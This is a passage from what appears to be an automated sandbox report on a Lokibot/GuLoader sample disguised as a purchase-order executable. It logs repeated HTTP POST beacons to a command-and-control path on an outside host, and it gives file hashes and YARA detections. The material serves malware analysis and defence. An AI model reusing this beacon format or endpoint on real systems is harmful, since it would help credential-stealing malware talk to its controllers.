                            Timestamp: Feb 23, 2021 08:49:50.602565050 CET  kBytes transferred: 5949  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:50.962508917 CET  kBytes transferred: 5958  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:50 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 25  Source IP: 192.168.2.5  Source Port: 49765  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:51.403125048 CET  kBytes transferred: 6010  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:51.755176067 CET  kBytes transferred: 6011  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:51 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 26  Source IP: 192.168.2.5  Source Port: 49766  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:52.189174891 CET  kBytes transferred: 6012  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:52.543189049 CET  kBytes transferred: 6012  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:52 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 27  Source IP: 192.168.2.5  Source Port: 49767  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:53.017834902 CET  kBytes transferred: 6013  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:53.370479107 CET  kBytes transferred: 6014  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:53 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 28  Source IP: 192.168.2.5  Source Port: 49768  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:53.820832968 CET  kBytes transferred: 6015  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:54.207701921 CET  kBytes transferred: 6016  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:53 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 29  Source IP: 192.168.2.5  Source Port: 49769  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:54.628473043 CET  kBytes transferred: 6020  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:54.987622023 CET  kBytes transferred: 6024  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:54 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 3  Source IP: 192.168.2.5  Source Port: 49735  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:29.621978045 CET  kBytes transferred: 5365  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:29.983164072 CET  kBytes transferred: 5365  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:29 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 30  Source IP: 192.168.2.5  Source Port: 49770  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:55.479697943 CET  kBytes transferred: 6029  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:55.832416058 CET  kBytes transferred: 6034  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:55 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 31  Source IP: 192.168.2.5  Source Port: 49771  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:56.264238119 CET  kBytes transferred: 6035  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:56.637950897 CET  kBytes transferred: 6035  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:56 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 32  Source IP: 192.168.2.5  Source Port: 49772  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:57.090883970 CET  kBytes transferred: 6036  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:57.455832958 CET  kBytes transferred: 6037  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:57 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 33  Source IP: 192.168.2.5  Source Port: 49773  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:57.912353039 CET  kBytes transferred: 6038  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:58.269815922 CET  kBytes transferred: 6038  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:58 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 34  Source IP: 192.168.2.5  Source Port: 49774  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:58.700265884 CET  kBytes transferred: 6039  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:59.063069105 CET  kBytes transferred: 6040  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:58 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 35  Source IP: 192.168.2.5  Source Port: 49775  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:59.551681042 CET  kBytes transferred: 6041  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:59.925751925 CET  kBytes transferred: 6041  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:59 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 36  Source IP: 192.168.2.5  Source Port: 49776  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:50:00.379571915 CET  kBytes transferred: 6042  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:50:00.736491919 CET  kBytes transferred: 6043  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:00 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 37  Source IP: 192.168.2.5  Source Port: 49777  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:50:01.225791931 CET  kBytes transferred: 6044  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:50:01.773279905 CET  kBytes transferred: 6044  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:01 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 38  Source IP: 192.168.2.5  Source Port: 49778  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:50:02.942234039 CET  kBytes transferred: 6045  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:50:03.318948984 CET  kBytes transferred: 6046  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:03 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 39  Source IP: 192.168.2.5  Source Port: 49779  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:50:04.328154087 CET  kBytes transferred: 6047  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:50:04.715640068 CET  kBytes transferred: 6047  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:04 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 4  Source IP: 192.168.2.5  Source Port: 49736  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:31.069634914 CET  kBytes transferred: 5366  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:31.424293995 CET  kBytes transferred: 5367  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:31 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 40  Source IP: 192.168.2.5  Source Port: 49780  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:50:05.623106956 CET  kBytes transferred: 6048  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:50:05.984535933 CET  kBytes transferred: 6049  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:05 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 5  Source IP: 192.168.2.5  Source Port: 49737  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:31.953352928 CET  kBytes transferred: 5367  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:32.325089931 CET  kBytes transferred: 5368  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:32 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 6  Source IP: 192.168.2.5  Source Port: 49738  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:32.896542072 CET  kBytes transferred: 5369  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:33.251894951 CET  kBytes transferred: 5369  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:32 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 7  Source IP: 192.168.2.5  Source Port: 49739  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:33.755837917 CET  kBytes transferred: 5370  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:34.109647989 CET  kBytes transferred: 5371  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:33 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            8           192.168.2.5  49740        192.185.78.145  80                C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp                            kBytes transferred  Direction  Data
                            Feb 23, 2021 08:49:34.630259037 CET  5372                OUT        POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:34.981544971 CET  5372                IN         HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:34 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            9           192.168.2.5  49741        192.185.78.145  80                C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp                            kBytes transferred  Direction  Data
                            Feb 23, 2021 08:49:35.508750916 CET  5373                OUT        POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:35.876161098 CET  5382                IN         HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:35 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Code Manipulations

                            Statistics

                            Behavior

                            System Behavior

                            General

                            Start time: 08:47:58
                            Start date: 23/02/2021
                            Path: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Wow64 process (32bit): true
                            Commandline: 'C:\Users\user\Desktop\PO-A2174679-06.exe'
                            Imagebase: 0x400000
                            File size: 86016 bytes
                            MD5 hash: FDEC289FB4626DD56BBB55770AE5F432
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: Visual Basic
                            Reputation: low

                            General

                            Start time: 08:48:51
                            Start date: 23/02/2021
                            Path: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Wow64 process (32bit): true
                            Commandline: 'C:\Users\user\Desktop\PO-A2174679-06.exe'
                            Imagebase: 0x400000
                            File size: 86016 bytes
                            MD5 hash: FDEC289FB4626DD56BBB55770AE5F432
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation: low

                            Disassembly

                            Code Analysis
